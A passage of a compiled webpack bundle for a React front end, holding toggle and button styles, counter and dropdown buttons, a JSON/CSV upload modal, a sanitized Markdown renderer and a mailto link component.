exports.push([module.i, ".Toggle__Toggle__1Hh7TM .Toggle__label__1rdCy2 {\n  -webkit-user-select: none;\n     -moz-user-select: none;\n      -ms-user-select: none;\n          user-select: none;\n}\n.Toggle__Toggle__1Hh7TM .Toggle__label__1rdCy2.Toggle__clickable__hXnklI {\n  cursor: pointer;\n}\n.Toggle__Toggle__1Hh7TM .react-toggle .Toggle__react-toggle-thumb__3RQAVj {\n  border: 0px solid rgba(0,0,0,0.1);\n  box-shadow: 0px 2px 1px 0px rgba(0,0,0,0.17);\n}\n.Toggle__Toggle__1Hh7TM .react-toggle--checked .Toggle__react-toggle-track__18W5Hq {\n  background-color: #569cff;\n}\n.Toggle__Toggle__1Hh7TM .react-toggle--checked .Toggle__react-toggle-thumb__3RQAVj {\n  border: inherit;\n  box-shadow: inherit;\n}\n.Toggle__Toggle__1Hh7TM .react-toggle--checked:hover .Toggle__react-toggle-track__18W5Hq {\n  background-color: #3b8cff;\n}\n.Toggle__Toggle__1Hh7TM .react-toggle--focus .Toggle__react-toggle-thumb__3RQAVj {\n  border: inherit;\n  box-shadow: inherit;\n}\n.Toggle__disabled__1Om0mm {\n  pointer-events: none;\n}\n.Toggle__disabled__1Om0mm .react-toggle .Toggle__react-toggle-track__18W5Hq {\n  background-color: #ddd;\n}\n.Toggle__disabled__1Om0mm .react-toggle--checked .Toggle__react-toggle-track__18W5Hq {\n  background-color: #ddd;\n}\n", ""]);

// exports
exports.locals = {
	"Toggle": "Toggle__Toggle__1Hh7TM",
	"label": "Toggle__label__1rdCy2",
	"clickable": "Toggle__clickable__hXnklI",
	"react-toggle-thumb": "Toggle__react-toggle-thumb__3RQAVj",
	"react-toggle-track": "Toggle__react-toggle-track__18W5Hq",
	"disabled": "Toggle__disabled__1Om0mm"
};

/***/ }),
/* 3596 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export CounterButton */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__CounterButton_styl__ = __webpack_require__(3597);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__CounterButton_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1__CounterButton_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }





var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_1__CounterButton_styl___default.a);

var CounterButton = function CounterButton(props) {
  var children = props.children,
      count = props.count,
      className = props.className,
      disabled = props.disabled,
      rest = _objectWithoutProperties(props, ['children', 'count', 'className', 'disabled']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    _extends({
      className: cx('CounterButton', { disabled: disabled })
    }, rest),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'button',
      { className: cx(__WEBPACK_IMPORTED_MODULE_1__CounterButton_styl___default.a.button, className, { disabled: disabled }) },
      children
    ),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'div',
      { className: __WEBPACK_IMPORTED_MODULE_1__CounterButton_styl___default.a.countContainer },
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        { className: __WEBPACK_IMPORTED_MODULE_1__CounterButton_styl___default.a.count },
        count
      )
    )
  );
};


/***/ }),
/* 3597 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3598);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./CounterButton.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./CounterButton.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3598 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".CounterButton__CounterButton__1-ZJlm {\n  position: relative;\n  display: flex;\n}\n.CounterButton__CounterButton__1-ZJlm .CounterButton__button__3xPt1j {\n  display: inline-block;\n  border-radius: 3px 0 0 3px;\n  margin-right: 0;\n}\n.CounterButton__CounterButton__1-ZJlm .CounterButton__countContainer__1LMC5J {\n  display: flex;\n  align-items: center;\n  background: #fff;\n  padding: 0 10px;\n  border: 1px solid #ddd;\n  border-left: none;\n  border-radius: 0 3px 3px 0;\n  font-weight: bold;\n}\n.CounterButton__CounterButton__1-ZJlm.CounterButton__disabled__3Qnu9y {\n  pointer-events: none;\n}\n.CounterButton__CounterButton__1-ZJlm.CounterButton__disabled__3Qnu9y .CounterButton__button__3xPt1j,\n.CounterButton__CounterButton__1-ZJlm.CounterButton__disabled__3Qnu9y .CounterButton__countContainer__1LMC5J,\n.CounterButton__CounterButton__1-ZJlm.CounterButton__disabled__3Qnu9y button {\n  border: 1px solid #ddd;\n  background: #efefef;\n  color: #8e8e8e;\n  pointer-events: none;\n}\n", ""]);

// exports
exports.locals = {
	"CounterButton": "CounterButton__CounterButton__1-ZJlm",
	"button": "CounterButton__button__3xPt1j",
	"countContainer": "CounterButton__countContainer__1LMC5J",
	"disabled": "CounterButton__disabled__3Qnu9y"
};

/***/ }),
/* 3599 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export CounterBadge */
/* unused harmony export DropdownButton */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__DropdownButton_styl__ = __webpack_require__(3600);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__DropdownButton_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__DropdownButton_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_components_Button__ = __webpack_require__(96);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_2__DropdownButton_styl___default.a);


var CounterBadge = function (_React$Component) {
  _inherits(CounterBadge, _React$Component);

  function CounterBadge() {
    _classCallCheck(this, CounterBadge);

    return _possibleConstructorReturn(this, (CounterBadge.__proto__ || Object.getPrototypeOf(CounterBadge)).apply(this, arguments));
  }

  _createClass(CounterBadge, [{
    key: 'render',
    value: function render() {
      var count = this.props.count;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('CounterBadge', { wide: count > 9 }) },
        count < 10 ? count : '9+'
      );
    }
  }]);

  return CounterBadge;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

var DropdownButton = function (_React$Component2) {
  _inherits(DropdownButton, _React$Component2);

  function DropdownButton() {
    _classCallCheck(this, DropdownButton);

    return _possibleConstructorReturn(this, (DropdownButton.__proto__ || Object.getPrototypeOf(DropdownButton)).apply(this, arguments));
  }

  _createClass(DropdownButton, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          onClick = _props.onClick,
          children = _props.children,
          isOpen = _props.isOpen,
          className = _props.className;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_components_Button__["a" /* Button */],
        {
          fill: 'none',
          onClick: onClick,
          className: cx('DropdownButton', className, { isOpen: isOpen }) },
        children
      );
    }
  }]);

  return DropdownButton;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3600 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3601);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./DropdownButton.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./DropdownButton.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3601 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, "/* **************************************************************************\n * CounterBadge\n * *************************************************************************/\n.DropdownButton__CounterBadge__UhXk3r {\n  position: absolute;\n  top: -4.2px;\n  right: -4.2px;\n  font-family: monospace;\n  width: 14px;\n  height: 14px;\n  line-height: 12px;\n  font-size: 10px;\n  box-shadow: 0 2px 4px rgba(0,0,0,0.2);\n  border-radius: 14px;\n  background: #d13f19;\n  color: #fff;\n}\n.DropdownButton__CounterBadge__UhXk3r.DropdownButton__wide__2VoEk5 {\n  width: 18px;\n}\n", ""]);

// exports
exports.locals = {
	"CounterBadge": "DropdownButton__CounterBadge__UhXk3r",
	"wide": "DropdownButton__wide__2VoEk5"
};

/***/ }),
/* 3602 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return UploadModal; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames__ = __webpack_require__(85);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__UploadModal_styl__ = __webpack_require__(3603);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__UploadModal_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3__UploadModal_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__Dropzone_js__ = __webpack_require__(804);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Spinner_js__ = __webpack_require__(802);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components_Button_ButtonGroup__ = __webpack_require__(401);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_trustar_2_0_components__ = __webpack_require__(42);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }






var cx = __WEBPACK_IMPORTED_MODULE_1_classnames___default.a.bind(__WEBPACK_IMPORTED_MODULE_3__UploadModal_styl___default.a);






/**
 * NOTE: we do not currently implement the 'accept' attribute because it was
 * causing issues on drag. See: https://github.com/paramaggarwal/react-dropzone/issues/57
 */

// NOTE: closePortal is required and it is supplied by the Portal component.
// However for some reason prop types does not detect it so we get a prop
// types warning if we define it as required
//


var StyledModalContainer = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'UploadModal__StyledModalContainer',
  componentId: 'sc-2xxhxx-0'
})(['position:absolute;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,0.5);z-index:999;']);

var StyledModalContent = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'UploadModal__StyledModalContent',
  componentId: 'sc-2xxhxx-1'
})(['position:absolute;top:50%;left:50%;width:100%;max-width:900px;transform:translate(-50%,-50%);background:', ';padding:1.67rem;border:1px solid ', ';box-shadow:0px 2px 40px 0px rgba(0,0,0,0.30);border-radius:3px;z-index:1000;'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.BORDER.hex;
});

var StyledButton = Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components_Button__["a" /* Button */]).withConfig({
  displayName: 'UploadModal__StyledButton',
  componentId: 'sc-2xxhxx-2'
})(['&&{margin-top:1.67rem;background-color:', ';}'], function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.SURFACE_LIGHTER.hex;
});

var UploadModal = function (_React$Component) {
  _inherits(UploadModal, _React$Component);

  function UploadModal() {
    var _ref4;

    var _temp, _this, _ret;

    _classCallCheck(this, UploadModal);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref4 = UploadModal.__proto__ || Object.getPrototypeOf(UploadModal)).call.apply(_ref4, [this].concat(args))), _this), _this.handleCloseModal = function (e) {
      e.stopPropagation();

      if (_this.props.closePortal) {
        _this.props.closePortal();
      }
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(UploadModal, [{
    key: 'componentDidUpdate',


    /**
     * After uploading completes we want to close the portal.
     */
    value: function componentDidUpdate() {
      if (this.props.status === 'UPLOADING') return;

      if (this.props.closePortal) {
        this.props.closePortal();
      }
    }
  }, {
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledModalContainer,
        { onClick: this.props.closePortal },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          StyledModalContent,
          { onClick: function onClick(e) {
              return e.stopPropagation();
            } },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            { className: cx(__WEBPACK_IMPORTED_MODULE_3__UploadModal_styl___default.a.ModalChildren) },
            this.props.children
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4__Dropzone_js__["a" /* Dropzone */], {
            className: cx(__WEBPACK_IMPORTED_MODULE_3__UploadModal_styl___default.a.importDropzone, _defineProperty({}, __WEBPACK_IMPORTED_MODULE_3__UploadModal_styl___default.a.disabled, this.props.status !== 'READY')),
            maxSize: Object(__WEBPACK_IMPORTED_MODULE_6__utils_utils_js__["mbToBytes"])(2),
            accept: '.json,.csv',
            acceptedFileFormatMessage: 'Accepted file formats: .json,.csv',
            onDropRejected: this.props.handleDropzoneError,
            onDropAccepted: this.props.onDropAccepted }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            StyledButton,
            {
              fill: 'none',
              onClick: this.handleCloseModal
            },
            'Close'
          ),
          this.props.status !== 'READY' && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5__Spinner_js__["b" /* Spinner */], { className: __WEBPACK_IMPORTED_MODULE_3__UploadModal_styl___default.a.inline })
        )
      );
    }
  }]);

  return UploadModal;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3603 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3604);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./UploadModal.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./UploadModal.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3604 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".UploadModal__UploadModal__acb5nE {\n  background: #d13f19;\n}\n.UploadModal__inline__3iHRf8 {\n  display: flex;\n  justify-content: center;\n  margin-bottom: 15px;\n}\n.UploadModal__inputSpinner__2hiyZw {\n  position: absolute;\n  top: 50%;\n  left: 50%;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n}\n.UploadModal__grayButton__17vY53 {\n  background: linear-gradient(to bottom, #fcfcfc, #eee);\n  border: 1px solid #d9d9d9;\n  color: #4a4a4a;\n/*\n  New Redesign Buttons\n  DEBUG: Folders\n  */\n  margin-top: 20px;\n}\n.UploadModal__grayButton__17vY53:hover {\n  background: linear-gradient(to bottom, #f7f7f7, #b3b3b3);\n  color: #4a4a4a;\n}\n.UploadModal__ModalChildren__2UWoh0 {\n  margin-bottom: 20px;\n}\n", ""]);

// exports
exports.locals = {
	"UploadModal": "UploadModal__UploadModal__acb5nE",
	"inline": "UploadModal__inline__3iHRf8",
	"inputSpinner": "UploadModal__inputSpinner__2hiyZw",
	"grayButton": "UploadModal__grayButton__17vY53",
	"ModalChildren": "UploadModal__ModalChildren__2UWoh0"
};

/***/ }),
/* 3605 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Markdown; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_sanitize_html__ = __webpack_require__(728);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_sanitize_html___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_sanitize_html__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

/* eslint-disable react/no-danger */



/**
 * The default set of allowed tags is a bit restrictive so we add more here.
 */
var sanitize = function sanitize(html) {
  return __WEBPACK_IMPORTED_MODULE_1_sanitize_html___default()(html, {
    allowedTags: __WEBPACK_IMPORTED_MODULE_1_sanitize_html___default.a.defaults.allowedTags.concat(['h1', 'h2', 'img']),
    allowedAttributes: _extends({}, __WEBPACK_IMPORTED_MODULE_1_sanitize_html___default.a.defaults.allowedAttributes, {
      img: ['src']
    })
  });
};

var Markdown = function Markdown(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', {
    className: props.className,
    dangerouslySetInnerHTML: { __html: sanitize(props.content) }
  });
};

/***/ }),
/* 3606 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export makeEmailForHref */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return MailToLink; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }




var defaultEmailTemplate = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Record"])({
  mailto: '',
  subject: '',
  body: ''
});

var makeEmailForHref = function makeEmailForHref(option) {
  var email = defaultEmailTemplate(option);
  return 'mailto:' + email.get('mailto') + '?subject=' + email.get('subject') + '&body=' + email.get('body');
};

var MailToLink = function (_Component) {
  _inherits(MailToLink, _Component);

  function MailToLink() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, MailToLink);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = MailToLink.__proto__ || Object.getPrototypeOf(MailToLink)).call.apply(_ref, [this].concat(args))), _this), _this.handleClick = function (e) {
      if (!_this.props.shouldEmail) {
        e.preventDefault();
      }
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(MailToLink, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          _props$mailto = _props.mailto,
          mailto = _props$mailto === undefined ? '' : _props$mailto,
          _props$subject = _props.subject,
          subject = _props$subject === undefined ? '' : _props$subject,
          _props$body = _props.body,
          body = _props$body === undefined ? '' : _props$body;

      var className = this.props.className;
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'a',
        {
          href: makeEmailForHref({
            mailto: mailto,
            subject: subject,
            body: body
          }),
          className: className,
          onClick: this.handleClick },
        this.props.children
      );
    }
  }]);

  return MailToLink;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

/***/ }),
/* 3607 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return TimelineSlider; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_d3_time_format__ = __webpack_require__(342);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_d3_scale__ = __webpack_require__(218);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_d3_array__ = __webpack_require__(103);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__TimelineSlider_styl__ = __webpack_require__(3608);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__TimelineSlider_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6__TimelineSlider_styl__);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }









